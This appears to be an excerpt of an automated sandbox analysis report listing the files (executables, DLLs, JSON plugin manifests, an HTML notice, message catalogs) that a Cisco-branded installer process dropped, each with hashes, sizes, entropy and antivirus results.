                                                                                                                                      File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):4467816
                                                                                                                                      Entropy (8bit):6.598146073323608
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:98304:+QCnFew3oMj8NiqvOE41lDJO2Gi3VjGClUjtbnaC:+TeOLECDJrpVSZbL
                                                                                                                                      MD5:03615EEF106C5E54C5279B05A9686B9A
                                                                                                                                      SHA1:621C9AB49367298751EAAB0E0A29575327041729
                                                                                                                                      SHA-256:7B6826DD31DB6E559BBF873DE756292B22B910F319C6C4B09D7A62A5312A4AC3
                                                                                                                                      SHA-512:BFB2ADE2B66B7CCD3E1CB9FCFAD2AF8D35BD12E063ECC1D388958C5A66776CC865CDD25B72B3786011C388C9A3FF730DAF5F97D58923829DA9DBC76AD393FCE8
                                                                                                                                      Malicious:false
                                                                                                                                      Antivirus:
                                                                                                                                      • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                      Joe Sandbox View:
                                                                                                                                      • Filename: , Detection: malicious, Browse
                                                                                                                                      • Filename: SecureClientInstaller.exe, Detection: malicious, Browse
                                                                                                                                      • Filename: SecureClientInstaller.exe, Detection: malicious, Browse
                                                                                                                                      Reputation:low
                                                                                                                                      Process:C:\Users\user\AppData\Local\Temp\is-DKP86.tmp\CiscoSetup.tmp
                                                                                                                                      File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):562280
                                                                                                                                      Entropy (8bit):5.250676972668652
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:12288:E51t8uFDD2edf0sC3Yeba96ga8nXNBZeph17:O12uR2ec3Yijg/dB4ph17
                                                                                                                                      MD5:A942F7085CF6E0584943727A7B804342
                                                                                                                                      SHA1:C79F5A2946400942F75BB6D05A853D4018ED7419
                                                                                                                                      SHA-256:AB1ABBFB3F0AD6A0E16F8FC94F485C67A8AB002A5C05549CF676E4D701E26FF0
                                                                                                                                      SHA-512:69D42640785AA0B4FABBADD894A92643B4D32BC6FB404B0CCC0B056D8413ABD3684D81BED43D10CED24620BF26A749B4F87A557916F987501986DCA9980C0F44
                                                                                                                                      Malicious:false
                                                                                                                                      Antivirus:
                                                                                                                                      • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                      Process:C:\Users\user\AppData\Local\Temp\is-DKP86.tmp\CiscoSetup.tmp
                                                                                                                                      File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):1134696
                                                                                                                                      Entropy (8bit):5.98101366214949
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:12288:8h0jAkQkbL6TwyIHQ6KkuD/wNo9beiC3Yeba96ga8nXNBZy:8hAA7kbL6TwyIHQZ/wNf3Yijg/dBU
                                                                                                                                      MD5:5E20E06C6F8A52DF2A20F24BF8E7ED28
                                                                                                                                      SHA1:F43253FC29F72A6792A49F8499C8547328CB3060
                                                                                                                                      SHA-256:B2628E6B3620070511BC7BFD7EC75BF30F194D69560DC4925A2CB208EBFF8EA5
                                                                                                                                      SHA-512:06733AA3684278AD1E00F0F7070BED46698422104AA89E3563154A6477186F0DC34B4C6598B101941AB9C34055891CA1A697B8F233156953D09A184291018CBD
                                                                                                                                      Malicious:false
                                                                                                                                      Antivirus:
                                                                                                                                      • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                      Process:C:\Users\user\AppData\Local\Temp\is-DKP86.tmp\CiscoSetup.tmp
                                                                                                                                      File Type:JSON data
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):297
                                                                                                                                      Entropy (8bit):4.260838473974518
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:6:3FHGzEGBX2WemHRSaiHaXQ0GshjQUoWyvNHiRCIrSa7V:1HTGBGXmHgak2uEiWygRgiV
                                                                                                                                      MD5:05BADC48F12BCC4CBF5B463321943D98
                                                                                                                                      SHA1:071138B7F1FFB97147891BA5A59C3C3B69FE4BD2
                                                                                                                                      SHA-256:9158CA8F1ECE84B45A80B9D43409A528B7D0493F38916A030876D70767C13630
                                                                                                                                      SHA-512:C1A0F2077676C37AD4B1AD5EAF4AB86BC9C516C82AD515B9A7E7A2A90D70080B2BC7CCC5E37C60F6C2D6A19775769AA8F610A91AFC1EE9F6358F941CF87976AD
                                                                                                                                      Malicious:false
                                                                                                                                      Preview:{.. "component" : [.. {.. "architecture" : "x86_64",.. "display_name" : "AnyConnect Kernel Driver Framework",.. "id" : "com.cisco.anyconnect.kdf",.. "platform" : "windows",.. "type" : "component",.. "version" : "5.0.04021".. }.. ]..}..
                                                                                                                                      Process:C:\Users\user\AppData\Local\Temp\is-DKP86.tmp\CiscoSetup.tmp
                                                                                                                                      File Type:JSON data
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):1375
                                                                                                                                      Entropy (8bit):3.276910195764313
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:24:1HTGBAZ6x2XA7h/xmv2uEi+Yx7E36x2XAiB/xmv2uEi+Yx78vUsPRmOV6V:BRAj02uEi+hAO02uEi+zhZmOo
                                                                                                                                      MD5:565E42342B7C2AF14F371A39589C1B67
                                                                                                                                      SHA1:DAB8871D9D3C5E565D40437FF366D944C1E51661
                                                                                                                                      SHA-256:13DDFA583A7C4A29EF617887C77AA4E3DA998F52F76D91E83C57B2D38192F555
                                                                                                                                      SHA-512:8F21388EA0BCD76ECCA88DEA5ED7292E64A0CC7BBA285272B02942D868E92ECB701D9ECBE2C172A87AF06FB16EA5DD2513075792ECB3556DC09C08A8CB4B7FD5
                                                                                                                                      Malicious:false
                                                                                                                                      Preview:{.. "component" : [.. {.. "dependencies" : [.. {.. "condition" : [.. {.. "architecture" : "x86".. },.. {.. "platform" : "windows".. }.. ],.. "display_name" : "AnyConnect Kernel Driver Framework",.. "id" : "com.cisco.anyconnect.kdf",.. "require" : [.. {.. "version" : "5.0.04021".. }.. ],.. "type" : "component".. },.. {.. "condition" : [.. {.. "architecture" : "x86_64".. },.. {.. "platform" : "windows".. }.. ],.. "display_name" : "AnyConnect Kernel Driver Framework",.. "id" : "com.cisco.anyconnect.kdf",.. "requ
                                                                                                                                      Process:C:\Users\user\AppData\Local\Temp\is-DKP86.tmp\CiscoSetup.tmp
                                                                                                                                      File Type:HTML document, ASCII text, with CRLF line terminators
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):556
                                                                                                                                      Entropy (8bit):4.645067217480077
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:12:VKYMF1IXH5EkqfXMF1ITOLKvXwCPijecTygdLe3f8ytWHtO+PGb:iF1a6AF1owBlPkNtWNa
                                                                                                                                      MD5:A54C8C0CFD88CFE16115DCFF322A637A
                                                                                                                                      SHA1:DFD99A331FE511542CEE60731DE1F603AB11C3AD
                                                                                                                                      SHA-256:50695A74F95C74DE1888A94F9BB0DC19E0237500DDD2352D56E4A17F30324AF5
                                                                                                                                      SHA-512:BDB7E36EBE6F0A9A1F2662C89B4F253A7F354C7A5F2596EE3C52247CA25AF9A6F14B75D432B68DFACFB3611533A0E88648D5F7F3E72099AAFCA4BFA833029AAD
                                                                                                                                      Malicious:false
                                                                                                                                      Preview:<html>.. <head>.. <title>Open Source Used In Cisco AnyConnect Secure Mobility Client</title>.. </head>.. <body>.. <h1>Open Source Used In Cisco AnyConnect Secure Mobility Client</h1>.. <br/>.. <h3>Please refer to <a href="https://www.cisco.com/go/opensource">Open Source in Cisco Products</a> for the latest information on the open source used in Cisco AnyConnect Secure Mobility Client.</h3>.. <br/>.. <p><font size="2">&copy;2023 Cisco Systems, Inc. All rights reserved.</font></p>.. </body>..</html>
                                                                                                                                      Process:C:\Users\user\AppData\Local\Temp\is-DKP86.tmp\CiscoSetup.tmp
                                                                                                                                      File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):3908712
                                                                                                                                      Entropy (8bit):6.887797216959267
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:49152:1R8wYv1zxStjGudpDcpXkuHdMRwou2pMOLmFn+d8tPB19nW/7BioqbCJ6JMfS20A:1R8w66ttdpDcpUs48nOL6+y719nWTT
                                                                                                                                      MD5:2A1D5A1BEB44C39B287BB7B9D34DC94E
                                                                                                                                      SHA1:F6BBD68D77978793BC348E181A1E8D2130C12AD3
                                                                                                                                      SHA-256:586085F4C7928D93E7C941705837506A69302168347136346D6784F78E67BBDD
                                                                                                                                      SHA-512:F05F14327B6C341444463CD774358D241655C06D910BAC2F72F007CD1052CE0832697E4F386C2F0810BE501F1E992B6E390A7484CCCEBFD0BB8522E7930246F3
                                                                                                                                      Malicious:false
                                                                                                                                      Antivirus:
                                                                                                                                      • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                      Process:C:\Users\user\AppData\Local\Temp\is-DKP86.tmp\CiscoSetup.tmp
                                                                                                                                      File Type:JSON data
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):115
                                                                                                                                      Entropy (8bit):4.299463045055552
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:3:3FF1JsfF3dNH4TLK8yH9XyIMGLz1KCr:3FFYttNYTmvHcIRP1fr
                                                                                                                                      MD5:769B51BA7501D6050DDC9A09C6A09B76
                                                                                                                                      SHA1:8BDE26C2B5B4AC5523C6B544147B01FF95A915D1
                                                                                                                                      SHA-256:4897DE44835053B78530EFAB879AD9BBC8C9480832757364FD953526F00D629A
                                                                                                                                      SHA-512:13A1DE06ECA2A5A2AFE33EBBCBF06BB9FFCC99F21D5E8216BCAC128AFDF9BCD9AFA57E3C4633E0006AAF0E43F11BC336986708D0ADAF154BC29F335F20723473
                                                                                                                                      Malicious:false
                                                                                                                                      Preview:{.. "plugin": {.. "relative-pathname": "vpnipsec.dll", .. "product-version": "5.0.05040".. }..}
                                                                                                                                      Process:C:\Users\user\AppData\Local\Temp\is-DKP86.tmp\CiscoSetup.tmp
                                                                                                                                      File Type:JSON data
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):118
                                                                                                                                      Entropy (8bit):4.356540827709149
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:3:3FF1JsfF3dNH4TLPSifLBHcH9XyIMGLz1KCr:3FFYttNYT/LB8HcIRP1fr
                                                                                                                                      MD5:FCD4980A92383439E287B087524C7BD9
                                                                                                                                      SHA1:A91FE2BC7B81A89184D6861EEAB6359C43B1510A
                                                                                                                                      SHA-256:47FA628E122440B0292AA2F4D645EBE7B7536D4400C3EF7EAD4E1C28DD77BCFB
                                                                                                                                      SHA-512:D72AE7FAE4E5D95C37E4F5B1A08648662DBF7407DDBD1DCAE0C0D07A45D19E0C2D421BB079CE77AACC766608BF1A61E479F755479881226D368273A8BDFED38C
                                                                                                                                      Malicious:false
                                                                                                                                      Preview:{.. "plugin": {.. "relative-pathname": "acwebhelper.dll", .. "product-version": "5.0.05040".. }..}
                                                                                                                                      Process:C:\Users\user\AppData\Local\Temp\is-DKP86.tmp\CiscoSetup.tmp
                                                                                                                                      File Type:JSON data
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):117
                                                                                                                                      Entropy (8bit):4.383545038270626
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:3:3FF1JsfF3dNH4TLPDlSncH9XyIMGLz1KCr:3FFYttNYTnlSncHcIRP1fr
                                                                                                                                      MD5:288FCD2FDDC8001D274BCFB8B30AE9E0
                                                                                                                                      SHA1:4B0E7C4FBD55EBB687D5521F9CA234A1391DBBF5
                                                                                                                                      SHA-256:CCECC9DF3B737D1F56F4B34280919C8592D0585224E72D0E0ABD9D9A536AF2E6
                                                                                                                                      SHA-512:F5B3E7E1AEB03B5244387BD1856B3BC059BAF8D4A414D9E1A44F8CC7736EE34D6BF00903857E382D769E550B014ECB74E5A00D3A6022BAC09FA9FA4F38259A7A
                                                                                                                                      Malicious:false
                                                                                                                                      Preview:{.. "plugin": {.. "relative-pathname": "acfeedback.dll", .. "product-version": "5.0.05040".. }..}
                                                                                                                                      Process:C:\Users\user\AppData\Local\Temp\is-DKP86.tmp\CiscoSetup.tmp
                                                                                                                                      File Type:JSON data
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):117
                                                                                                                                      Entropy (8bit):4.323029521506045
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:3:3FF1JsfF3dNH4TL2e2xcH9XyIMGLz1KCr:3FFYttNYTqegcHcIRP1fr
                                                                                                                                      MD5:B23D2052EB88D57B7EB5F3F6FE0B73DF
                                                                                                                                      SHA1:3B518BC2C90F511B0F026089E0EA617C532761CB
                                                                                                                                      SHA-256:EEAF72902741BE5DDA3A2C96DBC14545232A8CB4ABF97117AA8593D5876B182A
                                                                                                                                      SHA-512:38C528C6094EDD066C50509D970C8C3BDA08BD3206376BE79FA61453B216F14F1BA32E58A807C1EFD1C91A87C3E36953154299B78E1114379331D8BFC69A51F9
                                                                                                                                      Malicious:false
                                                                                                                                      Preview:{.. "plugin": {.. "relative-pathname": "vpnapishim.dll", .. "product-version": "5.0.05040".. }..}
                                                                                                                                      Process:C:\Users\user\AppData\Local\Temp\is-DKP86.tmp\CiscoSetup.tmp
                                                                                                                                      File Type:JSON data
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):117
                                                                                                                                      Entropy (8bit):4.323029521506045
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:3:3FF1JsfF3dNH4TL2e2xcH9XyIMGLz1KCr:3FFYttNYTqegcHcIRP1fr
                                                                                                                                      MD5:B23D2052EB88D57B7EB5F3F6FE0B73DF
                                                                                                                                      SHA1:3B518BC2C90F511B0F026089E0EA617C532761CB
                                                                                                                                      SHA-256:EEAF72902741BE5DDA3A2C96DBC14545232A8CB4ABF97117AA8593D5876B182A
                                                                                                                                      SHA-512:38C528C6094EDD066C50509D970C8C3BDA08BD3206376BE79FA61453B216F14F1BA32E58A807C1EFD1C91A87C3E36953154299B78E1114379331D8BFC69A51F9
                                                                                                                                      Malicious:false
                                                                                                                                      Preview:{.. "plugin": {.. "relative-pathname": "vpnapishim.dll", .. "product-version": "5.0.05040".. }..}
                                                                                                                                      Process:C:\Users\user\AppData\Local\Temp\is-DKP86.tmp\CiscoSetup.tmp
                                                                                                                                      File Type:JSON data
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):117
                                                                                                                                      Entropy (8bit):4.383545038270626
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:3:3FF1JsfF3dNH4TLPDlSncH9XyIMGLz1KCr:3FFYttNYTnlSncHcIRP1fr
                                                                                                                                      MD5:288FCD2FDDC8001D274BCFB8B30AE9E0
                                                                                                                                      SHA1:4B0E7C4FBD55EBB687D5521F9CA234A1391DBBF5
                                                                                                                                      SHA-256:CCECC9DF3B737D1F56F4B34280919C8592D0585224E72D0E0ABD9D9A536AF2E6
                                                                                                                                      SHA-512:F5B3E7E1AEB03B5244387BD1856B3BC059BAF8D4A414D9E1A44F8CC7736EE34D6BF00903857E382D769E550B014ECB74E5A00D3A6022BAC09FA9FA4F38259A7A
                                                                                                                                      Malicious:false
                                                                                                                                      Preview:{.. "plugin": {.. "relative-pathname": "acfeedback.dll", .. "product-version": "5.0.05040".. }..}
                                                                                                                                      Process:C:\Users\user\AppData\Local\Temp\is-DKP86.tmp\CiscoSetup.tmp
                                                                                                                                      File Type:JSON data
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):115
                                                                                                                                      Entropy (8bit):4.299463045055552
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:3:3FF1JsfF3dNH4TLK8yH9XyIMGLz1KCr:3FFYttNYTmvHcIRP1fr
                                                                                                                                      MD5:769B51BA7501D6050DDC9A09C6A09B76
                                                                                                                                      SHA1:8BDE26C2B5B4AC5523C6B544147B01FF95A915D1
                                                                                                                                      SHA-256:4897DE44835053B78530EFAB879AD9BBC8C9480832757364FD953526F00D629A
                                                                                                                                      SHA-512:13A1DE06ECA2A5A2AFE33EBBCBF06BB9FFCC99F21D5E8216BCAC128AFDF9BCD9AFA57E3C4633E0006AAF0E43F11BC336986708D0ADAF154BC29F335F20723473
                                                                                                                                      Malicious:false
                                                                                                                                      Preview:{.. "plugin": {.. "relative-pathname": "vpnipsec.dll", .. "product-version": "5.0.05040".. }..}
                                                                                                                                      Process:C:\Users\user\AppData\Local\Temp\is-DKP86.tmp\CiscoSetup.tmp
                                                                                                                                      File Type:JSON data
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):118
                                                                                                                                      Entropy (8bit):4.356540827709149
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:3:3FF1JsfF3dNH4TLPSifLBHcH9XyIMGLz1KCr:3FFYttNYT/LB8HcIRP1fr
                                                                                                                                      MD5:FCD4980A92383439E287B087524C7BD9
                                                                                                                                      SHA1:A91FE2BC7B81A89184D6861EEAB6359C43B1510A
                                                                                                                                      SHA-256:47FA628E122440B0292AA2F4D645EBE7B7536D4400C3EF7EAD4E1C28DD77BCFB
                                                                                                                                      SHA-512:D72AE7FAE4E5D95C37E4F5B1A08648662DBF7407DDBD1DCAE0C0D07A45D19E0C2D421BB079CE77AACC766608BF1A61E479F755479881226D368273A8BDFED38C
                                                                                                                                      Malicious:false
                                                                                                                                      Preview:{.. "plugin": {.. "relative-pathname": "acwebhelper.dll", .. "product-version": "5.0.05040".. }..}
                                                                                                                                      Process:C:\Users\user\AppData\Local\Temp\is-DKP86.tmp\CiscoSetup.tmp
                                                                                                                                      File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):42600
                                                                                                                                      Entropy (8bit):6.850341851307747
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:768:MoodVjT3FVIgFC1wTDRDGV5ENAMxGhDGVumuAMxkEX:norjT1VImC14DdxGhfxr
                                                                                                                                      MD5:0FA61F44C8C84022B2D7BC3D2D799562
                                                                                                                                      SHA1:6AB650840B91DF72F066A3D3882E5A8891F36E07
                                                                                                                                      SHA-256:65FD7DC0ED6E034BD6A956ABC357631B87B094A3587AAF91793233CC44E813EC
                                                                                                                                      SHA-512:FBB9156C946C1D110545ABCBB663A5A6B596EC4880F3400B4824728E5EF396B0976DFAF9F6E41377F3825DC7BC9D46DDB6BEA0172C9A51CEB55636D4722460B9
                                                                                                                                      Malicious:false
                                                                                                                                      Antivirus:
                                                                                                                                      • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                      Process:C:\Users\user\AppData\Local\Temp\is-DKP86.tmp\CiscoSetup.tmp
                                                                                                                                      File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):3058280
                                                                                                                                      Entropy (8bit):6.02927936674107
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:49152:I4MfZ031DVdQtj3IDJyfxR6oSmmr2E2y/dVevljoZj8OdoiM/dBVxfkT2vfsLt70:mR3IDJy5R6Smr9/jevlj67KBVxfkQ
                                                                                                                                      MD5:24DE4ED3FF1FA997F867B591BE4E001D
                                                                                                                                      SHA1:744D45EBD394880598B597D882AE2B634B9261FB
                                                                                                                                      SHA-256:7C4330C4BD0C6890C7EFC49AF493056B92332C65BE2BF885CD2A599369BA5349
                                                                                                                                      SHA-512:8A32756CFFCD10D6DF5F0B6DA917A203115431FE101B2B7746B1D8E76956B12F6AF5CE89BCE29BC505558943F4D661D45E2630B4B5790625B968549146EBEC88
                                                                                                                                      Malicious:false
                                                                                                                                      Antivirus:
                                                                                                                                      • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                      Process:C:\Users\user\AppData\Local\Temp\is-DKP86.tmp\CiscoSetup.tmp
                                                                                                                                      File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):124520
                                                                                                                                      Entropy (8bit):6.630785150590808
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:3072:G32Q9YYQbxksfyuSq/NyDbUzb7DCp+iSc9lxma:IhvQSphq/M8vpc9ia
                                                                                                                                      MD5:0B9FFCA43DA7770F1D5C77C7E9B9B3FE
                                                                                                                                      SHA1:F4FF02AC97542DAA7AFFA5AF61E956752CCE1809
                                                                                                                                      SHA-256:329F104D7F9E76BC20CAF68BA7AFC081B7E85EC9DF50E42C715CED146DDF4041
                                                                                                                                      SHA-512:15F52C15D6A9BFCFA2EAC5045E1DE6087A2222ACD701C7DD2376C3178659C6D83D26E6AED1AF8DD2EF1E8F493B10E4EFE13010C8C670627C748890FFE160917C
                                                                                                                                      Malicious:false
                                                                                                                                      Antivirus:
                                                                                                                                      • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                      Process:C:\Users\user\AppData\Local\Temp\is-DKP86.tmp\CiscoSetup.tmp
                                                                                                                                      File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):3058280
                                                                                                                                      Entropy (8bit):6.02927936674107
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:49152:I4MfZ031DVdQtj3IDJyfxR6oSmmr2E2y/dVevljoZj8OdoiM/dBVxfkT2vfsLt70:mR3IDJy5R6Smr9/jevlj67KBVxfkQ
                                                                                                                                      MD5:24DE4ED3FF1FA997F867B591BE4E001D
                                                                                                                                      SHA1:744D45EBD394880598B597D882AE2B634B9261FB
                                                                                                                                      SHA-256:7C4330C4BD0C6890C7EFC49AF493056B92332C65BE2BF885CD2A599369BA5349
                                                                                                                                      SHA-512:8A32756CFFCD10D6DF5F0B6DA917A203115431FE101B2B7746B1D8E76956B12F6AF5CE89BCE29BC505558943F4D661D45E2630B4B5790625B968549146EBEC88
                                                                                                                                      Malicious:false
                                                                                                                                      Antivirus:
                                                                                                                                      • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                      Process:C:\Users\user\AppData\Local\Temp\is-DKP86.tmp\CiscoSetup.tmp
                                                                                                                                      File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):124520
                                                                                                                                      Entropy (8bit):6.630785150590808
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:3072:G32Q9YYQbxksfyuSq/NyDbUzb7DCp+iSc9lxma:IhvQSphq/M8vpc9ia
                                                                                                                                      MD5:0B9FFCA43DA7770F1D5C77C7E9B9B3FE
                                                                                                                                      SHA1:F4FF02AC97542DAA7AFFA5AF61E956752CCE1809
                                                                                                                                      SHA-256:329F104D7F9E76BC20CAF68BA7AFC081B7E85EC9DF50E42C715CED146DDF4041
                                                                                                                                      SHA-512:15F52C15D6A9BFCFA2EAC5045E1DE6087A2222ACD701C7DD2376C3178659C6D83D26E6AED1AF8DD2EF1E8F493B10E4EFE13010C8C670627C748890FFE160917C
                                                                                                                                      Malicious:false
                                                                                                                                      Antivirus:
                                                                                                                                      • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                      Process:C:\Users\user\AppData\Local\Temp\is-DKP86.tmp\CiscoSetup.tmp
                                                                                                                                      File Type:GNU message catalog (little endian), revision 0.0, 2926 messages, Project-Id-Version: Cisco Secure Client 5.0.00000
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):350819
                                                                                                                                      Entropy (8bit):5.461097780903613
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:3072:LjH3U1ogMmeb7oVBKIuDVKuAYjG+chxEb1XVnh2MR+5+dJT8eRrDIpFmv0K1t:LjH3UKuVVBKfKh+qMR+5+dJTXDX1t
                                                                                                                                      MD5:2967DEC829A8EB7B1B28EDE05C47DCB8
                                                                                                                                      SHA1:F02FD55BF471D0BC97FE6F71ABC0A795B9C87475
                                                                                                                                      SHA-256:105BEB70A051B9C21C5C98EAB6F3C3E5EC01A54D6FDF25E86FD5BC9F113362DF
                                                                                                                                      SHA-512:A79CC293592DEF70B0C9EC83874DF23B4FA71DCAAA5C5656B2B0533BC7A91BCC8A65FCBF48124FD2E49D9CCA4B373E03F8294805F76BA19742377DA6856928FE
                                                                                                                                      Malicious:false
                                                                                                                                      Process:C:\Users\user\AppData\Local\Temp\is-DKP86.tmp\CiscoSetup.tmp
                                                                                                                                      File Type:GNU message catalog (little endian), revision 0.0, 2926 messages, Project-Id-Version: Cisco Secure Client 5.0.00000
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):350819
                                                                                                                                      Entropy (8bit):5.461097780903613
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:3072:LjH3U1ogMmeb7oVBKIuDVKuAYjG+chxEb1XVnh2MR+5+dJT8eRrDIpFmv0K1t:LjH3UKuVVBKfKh+qMR+5+dJTXDX1t
                                                                                                                                      MD5:2967DEC829A8EB7B1B28EDE05C47DCB8
                                                                                                                                      SHA1:F02FD55BF471D0BC97FE6F71ABC0A795B9C87475
                                                                                                                                      SHA-256:105BEB70A051B9C21C5C98EAB6F3C3E5EC01A54D6FDF25E86FD5BC9F113362DF
                                                                                                                                      SHA-512:A79CC293592DEF70B0C9EC83874DF23B4FA71DCAAA5C5656B2B0533BC7A91BCC8A65FCBF48124FD2E49D9CCA4B373E03F8294805F76BA19742377DA6856928FE
                                                                                                                                      Malicious:false
                                                                                                                                      Process:C:\Users\user\AppData\Local\Temp\is-DKP86.tmp\CiscoSetup.tmp
                                                                                                                                      File Type:GNU message catalog (little endian), revision 0.0, 2926 messages, Project-Id-Version: Cisco Secure Client 5.0.00000
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):361321
                                                                                                                                      Entropy (8bit):5.209740954129793
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:6144:LjH3UK9dlRVBKfKh++1/nK0Gg4tIOIeJgzu7b:L7hD1/Eqi
                                                                                                                                      MD5:896374392BD925153CD66C80C719F912
                                                                                                                                      SHA1:E640B935A2400502607218A0ACA6CC281EFC26A5
                                                                                                                                      SHA-256:D8264819DB8F3D333ECAC920A8C7240878114F30610EAB49FD817005199A8D29
                                                                                                                                      SHA-512:3693C050D0E759439E1B03144F623AB735F268D44F97AC7E7726CAF10B5D43F7266EAD8BD8267F57B79AFEF35945BE8D9157F77C77AFCC367C77706600925EB5
                                                                                                                                      Malicious:false
                                                                                                                                      Process:C:\Users\user\AppData\Local\Temp\is-DKP86.tmp\CiscoSetup.tmp
                                                                                                                                      File Type:GNU message catalog (little endian), revision 0.0, 2926 messages, Project-Id-Version: Cisco Secure Client 5.0.00000
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):361321
                                                                                                                                      Entropy (8bit):5.209740954129793
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:6144:LjH3UK9dlRVBKfKh++1/nK0Gg4tIOIeJgzu7b:L7hD1/Eqi
                                                                                                                                      MD5:896374392BD925153CD66C80C719F912
                                                                                                                                      SHA1:E640B935A2400502607218A0ACA6CC281EFC26A5
                                                                                                                                      SHA-256:D8264819DB8F3D333ECAC920A8C7240878114F30610EAB49FD817005199A8D29
                                                                                                                                      SHA-512:3693C050D0E759439E1B03144F623AB735F268D44F97AC7E7726CAF10B5D43F7266EAD8BD8267F57B79AFEF35945BE8D9157F77C77AFCC367C77706600925EB5
                                                                                                                                      Malicious:false
                                                                                                                                      Process:C:\Users\user\AppData\Local\Temp\is-DKP86.tmp\CiscoSetup.tmp
                                                                                                                                      File Type:GNU message catalog (little endian), revision 0.0, 2926 messages, Project-Id-Version: Cisco Secure Client 5.0.00000
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):354736
                                                                                                                                      Entropy (8bit):5.123789642260049
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:3072:LjH3U1ogM+Iy/aLiY2DBoVBKIuDVKuAYjG+chxEb1XVnhk0NrNQA/nUkSY:LjH3UKJZLiY2DyVBKfKh+w4i5ZY
                                                                                                                                      MD5:9D4300C87C9E378A13EFA9999D305929
                                                                                                                                      SHA1:0A7BB44A99208085296E782FD2E7B22170E7D03A
                                                                                                                                      SHA-256:D92D3E91F1B4036435CC6E39E2CE048DE7153A54577695313ACA1119DF70DE82
                                                                                                                                      SHA-512:297D7848FB011D8E79A7EE1B48D42227FC8582848B9232F4ED155B5FA1476C25654885FBD39E0207DD86F619BFC0FDE41A0D448365E5B1D57D7C359B7EAE3B1F
                                                                                                                                      Malicious:false
                                                                                                                                      Process:C:\Users\user\AppData\Local\Temp\is-DKP86.tmp\CiscoSetup.tmp
                                                                                                                                      File Type:GNU message catalog (little endian), revision 0.0, 2926 messages, Project-Id-Version: Cisco Secure Client 5.0.00000
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):354736
                                                                                                                                      Entropy (8bit):5.123789642260049
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:3072:LjH3U1ogM+Iy/aLiY2DBoVBKIuDVKuAYjG+chxEb1XVnhk0NrNQA/nUkSY:LjH3UKJZLiY2DyVBKfKh+w4i5ZY
                                                                                                                                      MD5:9D4300C87C9E378A13EFA9999D305929
                                                                                                                                      SHA1:0A7BB44A99208085296E782FD2E7B22170E7D03A
                                                                                                                                      SHA-256:D92D3E91F1B4036435CC6E39E2CE048DE7153A54577695313ACA1119DF70DE82
                                                                                                                                      SHA-512:297D7848FB011D8E79A7EE1B48D42227FC8582848B9232F4ED155B5FA1476C25654885FBD39E0207DD86F619BFC0FDE41A0D448365E5B1D57D7C359B7EAE3B1F
                                                                                                                                      Malicious:false
